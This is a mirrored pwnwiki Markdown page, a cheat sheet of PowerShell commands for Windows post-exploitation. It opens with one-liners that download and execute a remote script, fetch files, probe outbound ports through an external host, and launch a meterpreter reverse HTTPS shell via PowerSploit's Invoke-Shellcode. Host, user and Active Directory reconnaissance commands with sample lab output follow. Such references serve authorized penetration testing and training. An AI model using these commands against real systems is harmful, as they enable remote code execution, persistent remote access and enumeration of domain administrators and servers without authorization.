weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
pwnwiki.github.io/scripting/powershell.md
jakxx 17cf5397f2 Update description
2014-01-24 16:48:11 -05:00

8.3 KiB
Raw Blame History

Windows Powershell Commands and Scripts for Post Exploitation

One liners

Download and Execute Remote Powershell Script

iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")

Download and Save File

(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')

Enumerate Allowed Outbound Ports 1-1024 via securitypadawan.blogspot.com

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); 
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Reverse Shell Using PowerSploit's Invoke-Shellcode

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force

Commands with Sample Output

Hardware

Get BIOS Information

  • Command with arguments: gwmi win32_bios
  • Description: Retrieves BIOS information including system serial number.
  • Output:
    • **Windows 7:** Show/Hide
      PS C:\Users\johndoe> gwmi win32_bios
      SMBIOSBIOSVersion : 6.00
      Manufacturer : Phoenix Technologies LTD
      Name : PhoenixBIOS 4.0 Release 6.0
      SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
      Version : INTEL - 6040000

Get Drive Information

  • Command with arguments: [System.IO.DriveInfo]::GetDrives()
  • Output:
    • **Windows 7:** Show/Hide
      PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

      Name : C:\
      DriveType : Fixed
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 55568087552
      TotalFreeSpace : 55568087552
      TotalSize : 159876850304
      RootDirectory : C:\
      VolumeLabel :

      Name : D:\
      DriveType : CDRom
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : D:\
      VolumeLabel :

      Name : G:\
      DriveType : Removable
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : G:\
      VolumeLabel :

      Name : V:\
      DriveType : Network
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 259182640616
      TotalFreeSpace : 259182640616
      TotalSize : 827361812256
      RootDirectory : V:\
      VolumeLabel : TestMappedDrive

User Information

Display Username, SID, Last Used

  • Command with arguments: gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
  • Description: Retrieves information about system users.
  • Output:
    • **Windows 7:** Show/Hide
      PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
      on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto

      Name            SID                                            LastUseTime          localpath
      ----            ---                                            -----------          ---------
      WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
      WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
      WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
      WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...

Translate SID to Username

  • Command with arguments: ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value
  • Output:
    • **Windows 7:** Show/Hide
      PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
      1000")).translate([System.Security.Principal.NTAccount])).value
      WIN-244VDGE5OGH\johndoe

Using the PowerShell Active Directory Modules

Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/

Setting Credentials

Query to List "Domain Admins"

  • Command with arguments: Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"
  • Output:
    • **Windows 7:** Show/Hide
      distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
      name : Administrator
      objectClass : user
      objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
      SamAccountName : Administrator
      SID : S-1-5-21-2027135834-1792351174-2509185371-500

Enumerate All Servers on Domain

  • Command with arguments: Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name
  • Output:
    • **Windows 7:** Show/Hide
      name
      ----
      PWNT-DC

Exchange1
SharePoint1